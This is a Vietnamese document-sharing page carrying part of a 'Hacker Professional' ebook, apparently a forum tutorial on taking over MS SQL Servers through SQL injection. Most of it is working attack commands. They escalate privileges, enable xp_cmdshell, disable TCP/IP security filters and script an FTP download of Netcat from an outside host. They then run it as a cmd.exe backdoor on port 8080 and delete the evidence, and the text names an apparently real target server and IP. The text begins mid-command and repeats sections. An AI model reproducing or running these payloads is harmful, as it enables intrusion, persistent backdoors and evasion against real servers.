1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 237 pptx

6 66 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Nội dung

dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test' sp_password" 'Thay đổi mức quyền C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "exec master xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 sp_password" C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "exec master xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWO RD,0 sp_password" 'Xoá bỏ và khôi phục Log và firewall trong MS SQL C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "exec master xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters' sp_password" C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "exec master xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters',RE G_DWORD,0 sp_password" 'Cho phép sử dụng MASTER XP_CMDSHELL & ALLOW UPDATES C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "select * from openrowset('sqloledb', 'server=Digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override') sp_password" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 2. Đưa thêm các thông tin -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 'Cộng thêm một quyền quản trị mới ? 'Xem tat ca các nhóm của user ? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 3. Đưa backdoor lên server -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 'Tạo kịch bản trên server vào thư mục C:\WINDOWS\system32 ? 'Kiểm tra xem đã upload kịch bản thành công chưa C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "exec master xp_cmdshell 'dir uds' sp_password" 'Đọc nội dung một file kịch bản C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "exec master xp_cmdshell 'type uds' sp_password" 'Thực hiện kịch bản và Down backdoor Netcat về ? 'Xoá kịch bản đi vì trong đó có thông tin về host của mình C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q " exec master xp_cmdshell "del uds"') sp_password" 'Chay backdoor tren server o che do lang nghe ? C. Chạy backdoor trên server -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 1. Xác nhận backdoor đã được kích hoạt -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 'Vào DOS và thực hiện lệnh sau và chờ kết nối D:\>nc xxx.xxx.xxx.xxx 8080 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 2. Chiếm toàn bộ quyền điều khiển server -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 'Thay doi password UID hien thoi ? 'Liet ke thu muc cua o c C:\>osql -S xxx.xxx.xxx.xxx -U sa -P -Q "exec xp_dirtree 'c:' sp_password" 'Xem tat ca các nhóm của user ? o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o o-o Ok! chú bé nghiên cứu về sql và viết một bài hướng dẫn khá chi tiết cho các bạn tham khảo. Còn những chỗ đánh dấu ? chú bé chưa tiện công bố ra! nếu bạn nào muốn tìm hiểu thêm có thể liên hệ với chú bé. Vì ở đây là public nên chú bé không tiện nói hết !!!! Mong các bạn thông cảm. Nếu bạn nào có bài hướng dẫn hay về cách thủ thuật Hack thì hãy chia sẻ với chú bé nhé! chú bé sẽ không phụ lòng các bạn đâu Email: host_vietnam@yahoo.com YM: o0_whitehat_0o fantomas311(VNISS) Tổng hợp về SQL Injection (bài 11) B. Upload backdoor lên host -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 1. Xác định mức quyền và cho phép thực thi lệnh của MS SQL server -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 'Xác định mức quyền ;select * from openrowset('sqloledb','';;,'') Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'. /publications/titledetail.asp, line 159 'Do guest là db_owner của database master nên guest có thể thi hành xp_regwrite hoặc xp_cmdshell ;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test' 'Xác nhận guest đã nằm trong database master chưa and 68=convert(int,(select top 1 name from master sysusers where roles=0x01 and name not in('dbo'))) 'Cài cửa sau ;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test' 'Thay đổi mức quyền ;exec master xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 'Xoá bỏ và khôi phục Log và firewall trong MS SQL ;exec master xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters' 'Cho phép sử dụng MASTER XP_CMDSHELL & ALLOW UPDATES ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override') -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 2. Do thám đưa thêm các thông tin -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 'Do tham IP của server và đưa vào bảng testip ;drop table testip create table testip(stt int identity,dcip varchar(1000)) insert into testip exec master xp_cmdshell 'ping SCMW001' and 68=convert(char,(select top 1 dcip from testip where STT=1)) sp_password and 68=convert(char,(select top 1 dcip from testip where STT=2)) sp_password and 68=convert(char,(select top 1 dcip from testip where STT=3)) sp_password and 68=convert(char,(select top 1 dcip from testip where STT=4)) sp_password and 68=convert(char,(select top 1 dcip from testip where STT=5)) sp_password ;drop table testip ['Pinging scmw001.nmsi.ac.uk'] ['Reply from 193.62.107.4: bytes'] 'Tạo kịch bản để thực thi ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo open ftp05.websamba.com 21>>uds"') ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo user xxxxxx>>uds"') ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo xxxxxx>>uds"') ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo get uda.exe>>uds"') ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo get uds.exe>>uds"') ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo get uds.zip>>uds"') ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo quit>>uds"') 'Down backdoor Netcat về ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "ftp -v -i -n -s:uds"') 'Xoá kịch bản đi vì trong đó có thông tin về host của mình ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "del uds"') 'Khởi động Netcat ở chế độ lắng nghe ;select * from openrowset('sqloledb', 'server=SCMW001;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "uda.exe -l -p 8080 -e cmd.exe"') 'Chạy Netcat ở chế độ luôn lắng nghe bằng uda.exe (đổi tên Netcat) m:\>uds.exe -L -p 8080 -e cmd.exe 'Xoá bỏ và khôi phục Log và firewall trong MS SQL ;exec master xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters' Cái quan trọng là các lệnh này: ;exec master xp_regdeletevalue ;exec master xp_regwrite

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN